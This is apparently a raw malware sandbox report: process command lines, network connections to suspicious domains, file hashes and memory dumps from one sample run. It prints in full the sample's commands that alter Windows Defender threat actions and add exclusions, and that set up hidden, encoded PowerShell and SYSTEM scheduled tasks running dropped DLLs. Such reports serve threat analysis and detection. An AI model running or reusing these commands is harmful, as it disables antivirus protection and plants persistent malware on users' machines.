\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gMLAyRIKf" /SC once /ST 01:31:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gMLAyRIKf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gMLAyRIKf"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 00:10:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe\" Ci /Adsite_idbTs 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MWViHNuTpmRlpInKg"

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe Ci /Adsite_idbTs 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\kLLbZH.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\DEqklWO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\BaSMZgS.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\axofhyl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\XvHXZAA.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\GlGomVo.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 04:42:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\iwylrPXt\QdcQzQC.dll\",#1 /fgsite_idvFn 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BinjFlxHFUMMGNOij"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\iwylrPXt\QdcQzQC.dll",#1 /fgsite_idvFn 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\iwylrPXt\QdcQzQC.dll",#1 /fgsite_idvFn 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 96.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 201.179.17.96.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
DE 216.58.206.46:443 clients2.google.com tcp
US 44.240.147.44:80 api4.check-data.xyz tcp
US 52.111.227.11:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe

MD5 179fb197a3d7311375c9037091fc224c
SHA1 802c18d747c379acd9c9a1fcae6e29636b7bd224
SHA256 ff3ef3388be54902b91b3833f2abea5b31fe50f4b5f1cc8be06d6aca1b6683b9
SHA512 c2d30d078c1358fcbfa5079893ab21c745df2532deee61b84e3eec395efeded6769a73c3d961fbb7f71260a6303e0f9cf22f37111fb90e7b8d4e4fdbd0337317

memory/3160-16-0x00000000008A0000-0x0000000000F5A000-memory.dmp

memory/3160-17-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/5036-21-0x0000000072D30000-0x00000000734E1000-memory.dmp

memory/5036-22-0x00000000049E0000-0x00000000049F0000-memory.dmp

memory/5036-20-0x0000000004A30000-0x0000000004A66000-memory.dmp

memory/5036-24-0x00000000050A0000-0x00000000056CA000-memory.dmp

memory/5036-23-0x00000000049E0000-0x00000000049F0000-memory.dmp

memory/5036-25-0x0000000005030000-0x0000000005052000-memory.dmp

memory/5036-26-0x00000000058C0000-0x0000000005926000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2kikhdbs.zad.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5036-27-0x00000000059A0000-0x0000000005A06000-memory.dmp

memory/5036-36-0x0000000005A10000-0x0000000005D67000-memory.dmp

memory/5036-37-0x0000000005E90000-0x0000000005EAE000-memory.dmp

memory/5036-38-0x0000000005EE0000-0x0000000005F2C000-memory.dmp

memory/5036-41-0x0000000072D30000-0x00000000734E1000-memory.dmp

memory/3160-45-0x00000000008A0000-0x0000000000F5A000-memory.dmp

memory/1204-47-0x0000000000E60000-0x000000000151A000-memory.dmp

memory/1204-48-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/1396-51-0x0000000072E20000-0x00000000735D1000-memory.dmp

memory/1396-52-0x00000000035B0000-0x00000000035C0000-memory.dmp

memory/1396-58-0x0000000004510000-0x0000000004867000-memory.dmp

memory/1396-62-0x0000000004F90000-0x0000000004FDC000-memory.dmp

memory/1396-65-0x0000000072E20000-0x00000000735D1000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5b74da6778ccaa0e1ca4ae7484775943
SHA1 0a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA512 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

memory/4164-67-0x0000000072E20000-0x00000000735D1000-memory.dmp

memory/4164-68-0x0000000003F70000-0x0000000003F80000-memory.dmp

